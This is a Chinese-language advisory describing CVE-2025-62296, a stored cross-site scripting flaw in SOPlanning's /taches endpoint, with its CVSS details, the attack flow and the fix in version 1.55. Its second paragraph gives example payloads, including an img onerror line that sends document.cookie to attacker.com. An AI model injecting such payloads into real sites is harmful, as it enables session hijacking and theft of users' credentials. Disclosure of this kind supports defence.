CVE-2025-62296CVE-2025-62296是SOPlanning应用程序中发现的存储型跨站脚本(Stored XSS)漏洞。该漏洞存在于SOPlanning的/taches端点,攻击者可以利用此漏洞在受影响的Web应用中注入恶意HTML和JavaScript代码。由于是存储型XSS,恶意代码会被永久保存在服务器端,当其他用户访问相关页面时,注入的脚本会自动执行。攻击者需要具备中等权限(PR:L)才能成功利用此漏洞,并且需要用户交互(UI:R)来触发漏洞。CVSS 3.1评分为5.4,属于中等严重程度。漏洞影响SOPlanning的机密性和完整性,对机密性影响为低(L),对完整性影响也为低(L),可用性无影响(A:N)。该漏洞由[email protected]发现并报告,于2025年11月20日公开披露。攻击者可通过构造特定的恶意Payload,在任务的编辑器功能中注入任意脚本代码,当受害者打开编辑器时,注入的JavaScript代码将在其浏览器上下文中执行,可能导致会话劫持、敏感信息窃取或其他恶意操作。
SOPlanning的/taches端点存在存储型XSS漏洞,攻击者通过在任务创建或编辑功能中注入恶意JavaScript代码实现攻击。攻击流程如下:首先,攻击者需要拥有SOPlanning的中等权限账户(如普通用户角色);其次,攻击者在任务的描述字段、标题或其他输入框中注入包含恶意JavaScript代码的Payload,例如:<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>;由于SOPlanning未对用户输入进行充分的HTML实体编码或输入验证,恶意代码被直接存储在数据库中;当其他用户(如管理员或查看该任务的同事)打开任务编辑器或相关页面时,存储的恶意脚本会被浏览器解析执行,从而窃取用户的会话Cookie、凭据或其他敏感信息。攻击者利用窃取的会话可以进一步提升权限或执行其他恶意操作。漏洞的利用需要用户交互,攻击者通常会诱导受害者访问特定页面或打开特定任务以触发脚本执行。修复方案为升级到SOPlanning 1.55版本,该版本增加了输入验证和输出编码机制。